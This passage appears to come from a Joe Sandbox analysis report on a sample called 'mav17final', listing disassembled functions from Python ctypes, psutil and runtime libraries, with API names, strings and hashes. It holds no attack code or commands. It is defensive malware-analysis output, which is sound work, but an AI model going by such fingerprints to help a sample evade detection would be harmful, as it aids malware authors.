                                                  Function 00007FF8B9F65028 Relevance: 30.1, APIs: 20, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6504E
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65065
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6507D
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650A0
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650C6
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650EC
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65112
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65138
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6515E
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65181
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651A7
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651CD
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651F3
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65219
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6523F
                                                  • PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6526C
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65281
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652A0
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652B1
                                                  • PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F652D3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ReadyType_$Module_Type
                                                  • String ID:
                                                  • API String ID: 2298540608-0
                                                  • Opcode ID: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
                                                  • Instruction ID: fe649812218aa10936684200a38d4b6c9779117c7ac2106554818e3fe422b455
                                                  • Opcode Fuzzy Hash: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
                                                  • Instruction Fuzzy Hash: 9B718A20A19F9392FA419F29FC841252BA5BF45BEAF444039DA4D97774EF3CE10AC314
                                                  Function 00007FF8B9078B90 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 113serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseErrorHandleLastQueryStatus
                                                  • String ID: (sk)$QueryServiceStatusEx$unknown
                                                  • API String ID: 2049475656-71987940
                                                  • Opcode ID: 260939895f8968e7d6e986ed7e336b89b0b1d1d1002d1a47cba4b384be158184
                                                  • Instruction ID: c2fd47fa5896c92908f7ba6b6075edb162a096955617bf961a50312c397f9956
                                                  • Opcode Fuzzy Hash: 260939895f8968e7d6e986ed7e336b89b0b1d1d1002d1a47cba4b384be158184
                                                  • Instruction Fuzzy Hash: A7510D21A1DAC682EE14DF6AE8541796BA1FFA9BE4F444035DB4E43B64EF3CE4078700
                                                  Function 00007FF8BA24C78C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+$Replicator::operator[]
                                                  • String ID: `anonymous namespace'
                                                  • API String ID: 3863519203-3062148218
                                                  • Opcode ID: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
                                                  • Instruction ID: 550f045ffe893532339e6bb5e80a155102005404d716f2cba08a5bbfb20e766d
                                                  • Opcode Fuzzy Hash: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
                                                  • Instruction Fuzzy Hash: C6E13672A08B8299EB10DF2DE5801AD7BA0FB44B84F4441B6EF9D17B59DF38E554E700
                                                  Function 00007FF8B9F62C90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$LongLong_Occurred$Bytes_Capsule_CharClearFreeMem_Unicode_UnsignedWide
                                                  • String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
                                                  • API String ID: 3969321993-4137960972
                                                  • Opcode ID: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
                                                  • Instruction ID: 916fe931dedc0605be5d2df4c48712a079f3173fb19173bd10d45e4bfcd36065
                                                  • Opcode Fuzzy Hash: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
                                                  • Instruction Fuzzy Hash: 6451F632A19F8282EB448F29E89417827A0FF49BFAB185535DB5D837A8DF3CE551C350
                                                  Function 00007FF8B9F61404 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
                                                  • String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                  • API String ID: 2975079148-1488966637
                                                  • Opcode ID: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
                                                  • Instruction ID: 7eca9d6ff16c404f4d081a044a86e2c792e015458648155b138954e77fcd8c26
                                                  • Opcode Fuzzy Hash: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
                                                  • Instruction Fuzzy Hash: 20512821A09FC285EE508F59E9502B977A4EF4ABF6F18A535DB0E463A4EF3CE445C340
                                                  Function 00007FF8B9F69A88 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$String$Arg_AuditBuffer_ContiguousDeallocFormatFromMemoryObjectParseSizeSys_Tuple_View_
                                                  • String ID: Buffer size too small (%zd instead of at least %zd bytes)$O|n:from_buffer$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$underlying buffer is not C contiguous$underlying buffer is not writable
                                                  • API String ID: 3947696715-3790261066
                                                  • Opcode ID: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
                                                  • Instruction ID: b70d24247ee1fc7790b8c7ada05db2768837d910fc19dd9b6b5ac387476d495b
                                                  • Opcode Fuzzy Hash: 6f91a64f5329831d1cdf7c4b25470fb5dbaa7ad2f9e3551f3ba25eea1f825ae0
                                                  • Instruction Fuzzy Hash: 92412861A08BC681EA54CF2EE8901B927A1EF85BF6F086135DB1D477A5DF6CE588C300
                                                  Function 00007FF8B9F6D5F8 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 79threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_$Dict_Err_ItemMem_String$CallocDeallocDictErrorFreeFromInternOccurredPointerState_ThreadUnicode_ValidWith
                                                  • String ID: _ctypes pymem$cannot get thread state$ctypes.error_object$ctypes.error_object is an invalid capsule
                                                  • API String ID: 2323834031-3474121714
                                                  • Opcode ID: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
                                                  • Instruction ID: 318735d007ae14006ff4bfc844666fbbe453ce6c54eeee8b5209da6a2c00b523
                                                  • Opcode Fuzzy Hash: accf9b440147d9a92cb32684a6abaa720b59604840fdd08eebf715022aa40aa7
                                                  • Instruction Fuzzy Hash: 8731F320A0AF8381EA948F19EC541782BA0AF49BFBF596435DB0E437A4EF3DE545D310
                                                  Function 00007FF8B9074F30 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorInformationLastLogicalProcessor
                                                  • String ID: GetLogicalProcessorInformationEx() count was 0$GetLogicalProcessorInformationEx() returned %u$Win < 7; cpu_count_cores() forced to None$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 836211139-299206587
                                                  • Opcode ID: 4fbf2db0554dc03b03eaadc2732e5f3e02d61a734d2f394582dadc023be77089
                                                  • Instruction ID: 6b557b8ba70c32673dc5ee83be201f533888bc2b927862b0e8c869addf0e3f1d
                                                  • Opcode Fuzzy Hash: 4fbf2db0554dc03b03eaadc2732e5f3e02d61a734d2f394582dadc023be77089
                                                  • Instruction Fuzzy Hash: 3E512D21A096C682EF549F2DE8542B97BA1BF64BE1F44813ADB0E07795DF3CE846C350
                                                  Function 00007FF8B9F64118 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_$Format$AttrLookupObject_OccurredSequence_StringTupleTuple_
                                                  • String ID: _argtypes_ has too many arguments (%zi), maximum is %i$_argtypes_ must be a sequence of types$item %zd in _argtypes_ has no from_param method
                                                  • API String ID: 4102822968-1150265712
                                                  • Opcode ID: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
                                                  • Instruction ID: c1274b7ff749d5705b478a1423be304c4a0ebb626bc5c78f3abdff2c1223e475
                                                  • Opcode Fuzzy Hash: b465a1dad8b079f441bebe69d373bb45d8456e0132b52fc939e0217758a31e23
                                                  • Instruction Fuzzy Hash: 8E410622E0DF8392EA559F29E8440786BA0AF96FF6F082035CB0E46B64DE3CE545C310
                                                  Function 00007FF8B9F6D2E0 Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: From$FormatUnicode_$DeallocDoubleFloat_
                                                  • String ID: <cparam '%c' (%R)>$<cparam '%c' (%d)>$<cparam '%c' (%ld)>$<cparam '%c' (%lld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                  • API String ID: 1798191970-1075073485
                                                  • Opcode ID: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
                                                  • Instruction ID: f0b69bd779605589c1fdd6e2248dfe66ff526c7cfa630213eeadf11bbacfaa17
                                                  • Opcode Fuzzy Hash: e630b7be73e712d3a37526d796ee4f4f39b16323d62473f23fa0d0fb00351437
                                                  • Instruction Fuzzy Hash: 0C415162E0C6C782E7694F2DEC550381B61DF56BE6F281138C74E067A9DE2CF945E360
                                                  Function 00007FF8B9F69C0C Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Buffer_ReleaseString$Arg_AuditFormatParseSizeSys_Tuple_memcpy
                                                  • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$y*|n:from_buffer_copy
                                                  • API String ID: 2374319793-1742308441
                                                  • Opcode ID: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
                                                  • Instruction ID: 484033608bd456210c6263b488e247d9cffbd635328812e6c8518aa24279f96b
                                                  • Opcode Fuzzy Hash: 2d8fddc9779f14f0481d8ddfd406fb15762d92becc72ec0614fe25a827832394
                                                  • Instruction Fuzzy Hash: 48312861B18FC681EA508F5AE8402B96760FF85BE2F449036DB4E83765DE3CE449C300
                                                  Function 00007FF8B9F6C224 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AttrObject_String$Arg_Dealloc$KeywordsParseSequence_SizeSliceTuple_
                                                  • String ID: OOO:COMError$args$details$hresult$text
                                                  • API String ID: 4238450639-2065934886
                                                  • Opcode ID: 7b88bc987767ef29d30f6af4a34bd6ec754f27a2cd5e2595f319dc9faf46bccc
                                                  • Instruction ID: 189058dab90437c012c784b4198e491f918953bd82f6ef352d38aaf2643a0bcd
                                                  • Opcode Fuzzy Hash: 7b88bc987767ef29d30f6af4a34bd6ec754f27a2cd5e2595f319dc9faf46bccc
                                                  • Instruction Fuzzy Hash: B0312B61A08F8292FA109F6DE9411BA2BA0FF85BF6F486035CF4E47764DE2CE445C740
                                                  Function 00007FF8B9F645B8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 68threadlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_Eval_FromThread$Arg_AuditCharErrorFormatFreeLastLibraryLoadLong_Mem_ParseRestoreSaveStringSys_TupleUnicode_VoidWideWindows
                                                  • String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
                                                  • API String ID: 3805577924-808210370
                                                  • Opcode ID: 8085d2a71d9d3a5a76fe34bec048b7c14a2e952a150ea8cd1b327b92dda5160e
                                                  • Instruction ID: dafb12246e43aaa9766233cc62f924e57ea7374061a6b4f65100cbc9e198af33
                                                  • Opcode Fuzzy Hash: 8085d2a71d9d3a5a76fe34bec048b7c14a2e952a150ea8cd1b327b92dda5160e
                                                  • Instruction Fuzzy Hash: F5210A61E08FC386FA449FAAE8541796B61AF8ABF6F085035CB4E42364DF7CE449C710
                                                  Function 00007FF8B9F6C5B0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dealloc$StringUnraisableWrite$AttrClearFromImportImport_InternLongLong_ModuleObject_OccurredUnicode_
                                                  • String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
                                                  • API String ID: 3419117993-4136862661
                                                  • Opcode ID: 6480632f02bad077a56764e5c1bb2d947567b6f8de28b8c217792b4108e53cfe
                                                  • Instruction ID: 0844d4d1c954aa4b371dc91bccbc7b8ad0571e95d7abc54a628be9d3bd3bf97a
                                                  • Opcode Fuzzy Hash: 6480632f02bad077a56764e5c1bb2d947567b6f8de28b8c217792b4108e53cfe
                                                  • Instruction Fuzzy Hash: 0821BB21E09F8691FE549F29ED582342BA1AF5ABF7F086134CB4E46760EF2CA455C305
                                                  Function 00007FF8BA24D5B0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::$Name::operator+atolswprintf_s
                                                  • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                  • API String ID: 2331677841-2441609178
                                                  • Opcode ID: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
                                                  • Instruction ID: 125e2c7957815543d749d593b41b8f5bc2236b0b97d07459b6cc188b05d6a526
                                                  • Opcode Fuzzy Hash: 9797e925e62f8d7d60f646e305733279f9163504f8593401decf67f28b7cb35e
                                                  • Instruction Fuzzy Hash: BCF18A32E1C65384FB18AB7C8AA41BC27A1BF44FC4F4500B6CF4E66A95DE3DA945E340
                                                  Function 00007FF8B9F67FCF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$DeallocErr_Free$AttrFormatMallocMemoryObject_StringUnicode_
                                                  • String ID: %s:%s:$bit fields not allowed for type %s$number of bits invalid for bit field
                                                  • API String ID: 2455365098-3576608231
                                                  • Opcode ID: 2c8a630497d9b26071984d54006c75933da3e15f2b28fdb68437a92c613d873a
                                                  • Instruction ID: 63c7349a73bc2f0fe5b99d42c03ebf4576343760101e0bdc30dafa967d0d5032
